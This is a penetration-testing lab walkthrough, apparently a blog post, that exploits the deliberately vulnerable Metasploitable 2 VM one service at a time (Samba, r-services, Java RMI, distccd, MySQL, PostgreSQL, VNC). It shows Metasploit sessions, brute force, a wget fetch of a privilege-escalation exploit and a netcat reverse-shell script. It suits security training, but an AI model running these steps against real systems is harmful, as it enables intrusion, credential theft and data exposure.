Last login: Mon Nov 11 10:01:59 2013 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

You have mail.
root@metasploitable:~#

Here’s a video of the above process:

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

What is Samba?

Samba is software that can be run on a platform other than Microsoft Windows, for example, UNIX, Linux, IBM System 390, OpenVMS, and other operating systems. Samba uses the TCP/IP protocol that is installed on the host server. When correctly configured, it allows that host to interact with a Microsoft Windows client or server as if it is a Windows file and print server.

SMBD is part of Samba and is the server daemon that provides filesharing and printing services to Windows clients. The server provides filespace and printer services to clients using the SMB (or CIFS) protocol.

We can use the smbclient in the attacking Terminal to investigate the Samba Server. When prompted for the root password simply hit enter.

~# smbclient -L //192.168.1.103
Enter root's password: 
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

	Server               Comment
	---------            -------
	METASPLOITABLE       metasploitable server (Samba 3.0.20-Debian)

	Workgroup            Master
	---------            -------
	HOME                 BTHUB3
	WORKGROUP            METASPLOITABLE

We can dig down deeper into the tmp if we wish:

:~# smbclient //192.168.1.103/tmp
Enter root's password: 
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> ls
  .                                   D        0  Tue Nov 12 07:58:34 2013
  ..                                 DR        0  Sun May 20 20:36:12 2012
  5251.jsvc_up                        R        0  Mon Nov 11 15:02:52 2013
  .ICE-unix                          DH        0  Mon Nov 11 15:01:07 2013
  .X11-unix                          DH        0  Mon Nov 11 15:01:52 2013
  .X0-lock                           HR       11  Mon Nov 11 15:01:52 2013

		56891 blocks of size 131072. 42480 blocks available
smb: \>

We can check if this is writable:

smb: \> mkdir test
smb: \> ls
  .                                   D        0  Tue Nov 12 08:00:45 2013
  ..                                 DR        0  Sun May 20 20:36:12 2012
  5251.jsvc_up                        R        0  Mon Nov 11 15:02:52 2013
  .ICE-unix                          DH        0  Mon Nov 11 15:01:07 2013
  .X11-unix                          DH        0  Mon Nov 11 15:01:52 2013
  .X0-lock                           HR       11  Mon Nov 11 15:01:52 2013
  test                                D        0  Tue Nov 12 08:00:45 2013

It is indeed writable.

Our investigations have revealed Samba version 3.0.20 and the associated exploit is well documented:

A user named “kcopedarookie” posted what they claim to be a video of a zero-day exploit in Samba on youtube yesterday.

The video shows modifications to smbclient allowing /etc/passwd to be downloaded from a remote server.

The issue is actually a default insecure configuration in Samba.

Quick FAQ: What do I do !

Set:

  wide links = no

in the [global] section of your smb.conf and restart smbd to eliminate this problem.

Longer FAQ: The real issue

The problem comes from a combination of two features in Samba, each of which on their own are useful to Administrators, but in combination allow users to access any file on the system that their logged in username has permissions to read (this is not a privilege escalation problem).

By default Samba ships with the parameter “wide links = yes”, which allows Administrators to locally (on the server) add a symbolic link inside an exported share which SMB/CIFS clients will follow.

As an example, given a share definition:

  [tmp]
	path = /tmp
	read only = no
	guest ok = yes

The administrator could add a symlink:

  $ ln -s /etc/passwd /tmp/passwd

and SMB/CIFS clients would then see a file called “passwd” within the [tmp] share that could be read and would allow clients to read /etc/passwd.

If the “wide links” parameter is set to “no”, any attempt to read this file will fail with an “access denied” error.

The problem occurs as Samba allows clients using the UNIX extensions (which are also turned on by default) to create symlinks on remotely mounted shares on which they have write access that point to any path on the file system.

This is by design, as applications running on UNIX clients may have good reasons to create symlinks anywhere on the filesystem they have write access that point to local files (such as /etc/passwd).

UNIX clients will resolve these links locally, but Windows clients will resolve them on the server. It is this combination that causes the problem.

All future versions of Samba will have the parameter “wide links” set to “no” by default, and the manual pages will be updated to explain this issue.

OK, to the Metasploit exploit: This Samba version allows for symbolic links anywhere on the filesystem by default and so we use Metasploit’s Samba_symlink_traversal auxiliary:

msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > show options
Module options (auxiliary/admin/smb/samba_symlink_traversal):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBSHARE yes The name of a writeable share on the server
SMBTARGET rootfs yes The name of the directory that should point to the root filesystem

msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf auxiliary(samba_symlink_traversal) > set smbshare tmp
smbshare => tmp
msf auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server...
[*] Trying to mount writeable share 'tmp'...
[*] Trying to link 'rootfs' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.1.103\tmp\rootfs\

[*] Auxiliary module execution completed

If we now return to the smbclient, we will be served up with access to all of the disk’s contents from the rootfs folder:

:~# smbclient //192.168.1.103/tmp
Enter root's password: 
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> ls
  .                                   D        0  Tue Nov 12 08:35:42 2013
  ..                                 DR        0  Sun May 20 20:36:12 2012
  5251.jsvc_up                        R        0  Mon Nov 11 15:02:52 2013
  .ICE-unix                          DH        0  Mon Nov 11 15:01:07 2013
  .X11-unix                          DH        0  Mon Nov 11 15:01:52 2013
  .X0-lock                           HR       11  Mon Nov 11 15:01:52 2013
  rootfs                             DR        0  Sun May 20 20:36:12 2012
  test                                D        0  Tue Nov 12 08:00:45 2013

		56891 blocks of size 131072. 42480 blocks available
smb: \> cd rootfs
smb: \rootfs\> ls
  .                                  DR        0  Sun May 20 20:36:12 2012
  ..                                 DR        0  Sun May 20 20:36:12 2012
  initrd                             DR        0  Tue Mar 16 23:57:40 2010
  media                              DR        0  Tue Mar 16 23:55:52 2010
  bin                                DR        0  Mon May 14 05:35:33 2012
  lost+found                         DR        0  Tue Mar 16 23:55:15 2010
  mnt                                DR        0  Wed Apr 28 22:16:56 2010
  sbin                               DR        0  Mon May 14 03:54:53 2012
  initrd.img                          R  7929183  Mon May 14 05:35:56 2012
  home                               DR        0  Fri Apr 16 08:16:02 2010
  lib                                DR        0  Mon May 14 05:35:22 2012
  usr                                DR        0  Wed Apr 28 06:06:37 2010
  proc                               DR        0  Mon Nov 11 15:00:24 2013
  root                               DR        0  Mon Nov 11 15:01:51 2013
  sys                                DR        0  Mon Nov 11 15:00:28 2013
  boot                               DR        0  Mon May 14 05:36:28 2012
  nohup.out                           R     6542  Mon Nov 11 15:01:51 2013
  etc                                DR        0  Mon Nov 11 15:01:24 2013
  dev                                DR        0  Mon Nov 11 15:01:09 2013
  vmlinuz                             R  1987288  Thu Apr 10 18:55:41 2008
  opt                                DR        0  Tue Mar 16 23:57:39 2010
  var                                DR        0  Wed Mar 17 15:08:23 2010
  cdrom                              DR        0  Tue Mar 16 23:55:51 2010
  tmp                                 D        0  Tue Nov 12 08:35:42 2013
  srv                                DR        0  Tue Mar 16 23:57:38 2010

		56891 blocks of size 131072. 42480 blocks available
smb: \rootfs\>

We can also access a shell of Samba using Metasploit’s usermap_script exploit:

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo KBoA0aqYLD2VrWzT;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "KBoA0aqYLD2VrWzT\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:48635) at 2013-11-12 17:38:37 +0000

whoami
root

Below is a video demonstrating this Metasploit shell exploit:

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
512/tcp   open  exec?
513/tcp   open  login
514/tcp   open  tcpwrapped

All of these ports are running “r” services. These have been configured to allow remote access from any host. In this case they have been poorly configured.

Looking at the Nessus report is very revealing regarding port 514:

Port 514/tcp

rsh Unauthenticated Access (via finger Information)

Synopsis

It was possible to log on this machine without password.

Description

Using common usernames as well as the usernames reported by ‘finger’, Nessus was able to log in through rsh. Either the accounts are not protected by passwords or the ~/.rhosts files are not configured properly.

This vulnerability is confirmed to exist in Cisco Prime LAN Management Solution, but could be present on any host that is not securely configured

Solution

If the remote host is a Cisco Prime LAN Management Solution virtual appliance, apply the relevant patch referenced in Cisco security advisory cisco-sa-20130109-lms.

Otherwise, remove the .rhosts files or set a password on the impacted accounts.

Risk Factor

Critical

Ports - tcp/514

It was possible to log into this host using the account ‘root’.
Here is the output of the ‘id’ command :
uid=0(root) gid=0(root) groups=0(root)

It was possible to log into this host using the account ‘bin’.
Here is the output of the ‘id’ command :
uid=2(bin) gid=2(bin) groups=2(bin)

It was possible to log into this host using the account ‘daemon’.
Here is the output of the ‘id’ command :
uid=1(daemon) gid=1(daemon) groups=1(daemon)

It was possible to log into this host using the account ‘nobody’.
Here is the output of the ‘id’ command :
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

It was possible to log into this host using the account ‘postgres’.
Here is the output of the ‘id’ command :
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)

This port is wide open.

In order to exploit these misconfigured vulnerable remote access services we must ensure that we have ”rsh-client” installed on the attacking machine, which we can achieve via the Terminal with the apt-get install command. Once we have this the exploit could not be simpler:

:~# rlogin -l root 192.168.1.103
Last login: Tue Nov 12 16:59:44 EST 2013 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

You have mail.
root@metasploitable:~#

Simple as that!

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
1099/tcp  open  rmiregistry GNU Classpath grmiregistry

From Wiki:

The Java Remote Method Invocation (Java RMI) is a Java API that performs the object-oriented equivalent of remote procedure calls (RPC), with support for direct transfer of serialized Java objects and distributed garbage collection.

OK, let’s have a look in Metasploit:

msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    1099             yes       The target port
SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT  8080             yes       The local port to listen on.
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                   no        The URI to use for this exploit (default is random)

Exploit target:

Id  Name
--  ----
0   Generic (Java Payload)

msf exploit(java_rmi_server) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(java_rmi_server) > exploit

[*] Started reverse handler on 192.168.1.78:4444
[*] Using URL: http://0.0.0.0:8080/02Bwa0tNBOFx
[*]  Local IP: http://192.168.1.70:8080/02Bwa0tNBOFx
[*] Connected and sending request for http://192.168.1.78:8080/02Bwa0tNBOFx/apQlsfJd.jar
[*] 192.168.1.103    java_rmi_server - Replied to request for payload JAR
[*] Sending stage (30355 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.78:4444 -> 192.168.1.103:54392) at 2013-11-13 09:19:06 +0000
[+] Target 192.168.1.103:1099 may be exploitable...
[*] Server stopped.

meterpreter >

Below is a video demonstrating the above exploit.

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
1524/tcp  open  ingreslock?

Ingreslock was popular for adding a backdoor on to a compromised server.

The Nessus report had this to say on port 1524:

1524/tcp

Rogue Shell Backdoor Detection

Synopsis

The remote host may have been compromised.

Description

A shell is listening on the remote port, without any authentication. An attacker may use it by connecting to the remote port and sending commands directly.

And so we can test the backdoor connection in the attacking Terminal:

:~# telnet 192.168.1.103 1524
Trying 192.168.1.103...
Connected to 192.168.1.103.
Escape character is '^]'.
root@metasploitable:/#

Very simple.

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
2121/tcp  open  ftp         ProFTPD 1.3.1

The Nessus report on Port 2121 had this to say:

2121/tcp

FTP Supports Clear Text Authentication

Synopsis

Authentication credentials might be intercepted.

Description

The remote FTP server allows the user’s name and password to be transmitted in clear text, which could be intercepted by a network sniffer or a man-in-the-middle attack.

In truth none of this information helped me and I was unable to find a Metasploit exploit that related to version 1.3.1. Other version attacks were available.

I had a look for exploits in the wild, but again, couldn’t figure out their application.

Most of the guidance online talks of using a password cracking tool for this ftp service; however, I’m going to skip that and presume that within the context of previous exploits we have already enumerated user names and passwords.

So, to log in via the attacking Terminal. We will use the credentials of msfadmin/msfadmin for username/password:

~# ftp 192.168.1.103 2121
Connected to 192.168.1.103.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.1.103]
Name (192.168.1.103:root): msfadmin
331 Password required for msfadmin
Password:
230 User msfadmin logged in
Remote system type is UNIX.
Using binary mode to transfer files.

Then we can have a look at files:

ftp> ls -lat
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwx------   2 msfadmin msfadmin     4096 Nov 14 11:25 .gconfd
drwx------   2 msfadmin msfadmin     4096 Nov 14 11:25 .gconf
drwxr-xr-x   7 msfadmin msfadmin     4096 Nov 13 11:25 .
-rwx------   1 msfadmin msfadmin        4 May 20  2012 .rhosts
-rw-------   1 root     root         4174 May 14  2012 .mysql_history
lrwxrwxrwx   1 root     root            9 May 14  2012 .bash_history -> /dev/null
drwx------   2 msfadmin msfadmin     4096 May 18  2010 .ssh
-rw-r--r--   1 msfadmin msfadmin        0 May  7  2010 .sudo_as_admin_successful
drwxr-xr-x   6 msfadmin msfadmin     4096 Apr 28  2010 vulnerable
drwxr-xr-x   4 msfadmin msfadmin     4096 Apr 17  2010 .distcc
drwxr-xr-x   6 root     root         4096 Apr 16  2010 ..
-rw-r--r--   1 msfadmin msfadmin      586 Mar 16  2010 .profile
226 Transfer complete

And download some files for further investigation:

ftp> get .bash_history
local: .bash_history remote: .bash_history
200 PORT command successful
550 .bash_history: Not a regular file
ftp> get .profile
local: .profile remote: .profile
200 PORT command successful
150 Opening BINARY mode data connection for .profile (586 bytes)
226 Transfer complete
586 bytes received in 0.01 secs (89.9 kB/s)

We can navigate to .ssh and look for files:

ftp> cd .ssh
250 CWD command successful
ftp> ls -lat
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   7 msfadmin msfadmin     4096 Nov 13 11:25 ..
drwx------   2 msfadmin msfadmin     4096 May 18  2010 .
-rw-------   1 msfadmin msfadmin     1675 May 18  2010 id_rsa
-rw-r--r--   1 msfadmin msfadmin      405 May 18  2010 id_rsa.pub
-rw-r--r--   1 msfadmin msfadmin      609 May  7  2010 authorized_keys
226 Transfer complete

And then download the key pair:

ftp> get id_rsa
local: id_rsa remote: id_rsa
200 PORT command successful
150 Opening BINARY mode data connection for id_rsa (1675 bytes)
226 Transfer complete
1675 bytes received in 0.02 secs (88.6 kB/s)
ftp> get id_rsa.pub
local: id_rsa.pub remote: id_rsa.pub
200 PORT command successful
150 Opening BINARY mode data connection for id_rsa.pub (405 bytes)
226 Transfer complete
405 bytes received in 0.00 secs (275.4 kB/s)
ftp>

Hat-tip to the iPositive Security Blog who concludes with:

The user has Read/Write privileges using FTP service. Even though these users are non-root accounts, and have RW privs in their home directories, we have gained a foothold into the target. This is also applicable to other system / network services such as samba [ file sharing ] or ssh [ remote access ]. Using these accounts, it is now possible for us to explore the file system, configuration(s), set up, any specific software(s) / applications that are installed and may be vulnerable. Also a good idea is to upload backdoor / malware / trojan / privilege escalation exploit(s) on the server. The expectation is to wait for some user, usually root or root privileged user, to access these malicious exes and run them. Once the exe runs, depending upon its function, a variety of actions can be performed. Actions can include and are not limited to gaining shell, execute commands, sniff sensitive data off the wire and send the logs to the attacker, enumerate other systems in the network environment for further exploitation etc, and many more.

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5

The Nessus report on this port was very revealing; here is some of the information:

3306/tcp

MySQL Unpassworded Account Check

Synopsis

The remote database server can be accessed without a password.

Description

It is possible to connect to the remote MySQL database server using an unpassworded account. This may allow an attacker to launch further attacks against the database.

The ‘root’ account does not have a password.

Here is the list of databases on the remote server :

- information_schema
- dvwa
- metasploit
- mysql
- owasp10
- tikiwiki
- tikiwiki195

Version : 5.0.51a-3ubuntu5
Protocol : 10
Server Status : SERVER_STATUS_AUTOCOMMIT
Server Capabilities :
CLIENT_LONG_FLAG (Get all column flags)
CLIENT_CONNECT_WITH_DB (One can specify db on connect)
CLIENT_COMPRESS (Can use compression protocol)
CLIENT_PROTOCOL_41 (New 4.1 protocol)
CLIENT_SSL (Switch to SSL after handshake)
CLIENT_TRANSACTIONS (Client knows about transactions)
CLIENT_SECURE_CONNECTION (New 4.1 authentication)

The ‘root’ account does not have a password! So, let’s see if we can connect to the SQL database with the username root and a blank password.

~# mysql -h 192.168.1.103 -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

And there we have the database connection. Let’s have a look at the databases:

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.01 sec)

Let’s choose mysql database and have a look at the tables:

mysql> use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| columns_priv              |
| db                        |
| func                      |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| proc                      |
| procs_priv                |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
17 rows in set (0.00 sec)

Let’s have a look at users and their passwords:

mysql> select User, Password from user;
+------------------+----------+
| User             | Password |
+------------------+----------+
| debian-sys-maint |          |
| root             |          |
| guest            |          |
+------------------+----------+
3 rows in set (0.00 sec)

mysql>

So, three users without passwords we can use.
Let’s have a look at tables within another database:

mysql> show tables from owasp10;
+-------------------+
| Tables_in_owasp10 |
+-------------------+
| accounts          |
| blogs_table       |
| captured_data     |
| credit_cards      |
| hitlog            |
| pen_test_tools    |
+-------------------+
6 rows in set (0.01 sec)

We’ll change database and have a look at credit card details:

mysql> use owasp10
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from credit_cards;
+------+------------------+------+------------+
| ccid | ccnumber | ccv | expiration |
+------+------------------+------+------------+
| 1 | 4444111122223333 | 745 | 2012-03-01 |
| 2 | 7746536337776330 | 722 | 2015-04-01 |
| 3 | 8242325748474749 | 461 | 2016-03-01 |
| 4 | 7725653200487633 | 230 | 2017-06-01 |
| 5 | 1234567812345678 | 627 | 2018-11-01 |
+------+------------------+------+------------+
5 rows in set (0.03 sec)
mysql>

Hat-Tip to PentestLab for the MYSQL post exploitation.

Below is a SecurityTube video obtaining a root shell via Metasploit:

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
3632/tcp  open  distccd?

What is distccd?

Distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. distcc should always generate the same results as a local build, is simple to install and use, and is usually much faster than a local compile.

OK, time to search Metasploit:

msf > search distccd
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                           Disclosure Date  Rank       Description
   ----                           ---------------  ----       -----------
   exploit/unix/misc/distcc_exec  2002-02-01       excellent  DistCC Daemon Command Execution

Let’s run the exploit:

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3632             yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(distcc_exec) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo i5VOR5zoE9EvGttx;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "i5VOR5zoE9EvGttx\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:46436) at 2013-11-19 10:59:04 +0000

whoami
daemon

As we can see from the “whoami” we have achieved a daemon shell.

Now we will escalate our privilege from daemon to root using the 141 Local Privilege Escalation Exploit.

Firstly we get the exploit:

wget http://www.exploit-db.com/download/8572
--02:23:28--  http://www.exploit-db.com/download/8572
           => `8572'
Resolving www.exploit-db.com... 23.23.129.3, 23.23.150.193
Connecting to www.exploit-db.com|23.23.129.3|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/8572/ [following]
--02:23:29--  http://www.exploit-db.com/download/8572/
           => `index.html'
Reusing existing connection to www.exploit-db.com:80.
HTTP request sent, awaiting response... 200 OK
Length: 2,768 (2.7K) [application/txt]

    0K ..                                                    100%  414.77 KB/s

02:23:30 (414.77 KB/s) - `index.html' saved [2768/2768]

mv index.html exploit.c
gcc exploit.c -o exploit

The exploit instructions are:

Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1].

The exploit will execute /tmp/run as root so throw whatever payload you want in there.

Put simply we must find the PID of udevd and subtract 1:

pgrep udevd
3125

Now we need to open Netcat in a new Terminal in port listening mode:

:~# nc -vlp 12345
listening on [any] 12345 ...

Now to the exploit (Note the second line is your attacking IP and the Netcat port and line three is the PID minus one.

echo "#!/bin/sh" > /tmp/run
echo "nc -e /bin/sh 192.168.1.78 12345" >> /tmp/run
./exploit 3124

And our Netcat listener should come alive:

192.168.1.103: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.78] from (UNKNOWN) [192.168.1.103] 55574
whoami
root

And as you can see we are root!

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 – 8.3.7

This exploit is straight forward brute force using Metasploit:

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(postgres_login) > run

[*] 192.168.1.103:5432 Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'postgres':''
[-] 192.168.1.103:5432 Postgres - [01/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [02/21] - Trying username:'' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: '':''
[-] 192.168.1.103:5432 Postgres - [02/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'scott':''
[-] 192.168.1.103:5432 Postgres - [03/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'admin':''
[-] 192.168.1.103:5432 Postgres - [04/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] 192.168.1.103:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.1.103:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)

And there we have it; username and password are both postgres.

So let’s connect via the postgres client in the Terminal:

# psql -h 192.168.1.103 -U postgres -W
Password for user postgres: 
psql (9.1.9, server 8.3.1)
WARNING: psql version 9.1, server version 8.3.
         Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.

postgres=# \l
                    List of databases
   Name    |  Owner   | Encoding |   Access privileges   
-----------+----------+----------+-----------------------
 postgres  | postgres | UTF8     | 
 template0 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
 template1 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
(3 rows)

postgres=#

Below is a video demonstrating the above with additional post exploitation maneuvers:

Now we have the password we can also use Metasploit to obtain a Meterpreter shell:

msf > use exploit/linux/postgres/postgres_payload
msf exploit(postgres_payload) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD                   no        The password for the specified username. Leave blank for a random password.
   RHOST     192.168.1.103    yes       The target address
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf exploit(postgres_payload) > set PASSWORD postgres
PASSWORD => postgres
msf exploit(postgres_payload) > set PAYLOAD linux/x86/meterpreter/bind_tcp
PAYLOAD => linux/x86/meterpreter/bind_tcp
msf exploit(postgres_payload) > exploit

[*] Started bind handler
[*] 192.168.1.103:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/fTDEMbhY.so, should be cleaned up automatically
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.78:49575 -> 192.168.1.103:4444) at 2013-11-20 08:04:41 +0000

meterpreter >

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
5900/tcp  open  vnc         VNC (protocol 3.3)

The information online pertaining to exploiting this VNC service all use brute force techniques; however, the Nessus output for this port is revealing:

Port 5900/tcp
VNC Server ‘password’ Password

Synopsis
A VNC server running on the remote host is secured with a weak password.

Description
The VNC server running on the remote host is secured with a weak password. Nessus was able to login using VNC authentication and a password of ‘password’. A remote, unauthenticated attacker could exploit this to take control of the system.

Solution
Secure the VNC service with a strong password.

Risk Factor
Critical

CVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

Plugin Information:
Publication date: 2012/08/29, Modification date: 2012/08/29

Ports
tcp/5900

Nessus logged in using a password of “password”.

As we can see Nessus has done all the hard work discovering the VNC password is password.

All that’s left for us to do is to log in to the VNC service via the attacking Terminal:

# vncviewer 192.168.1.103
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

And up pops the virtual desktop: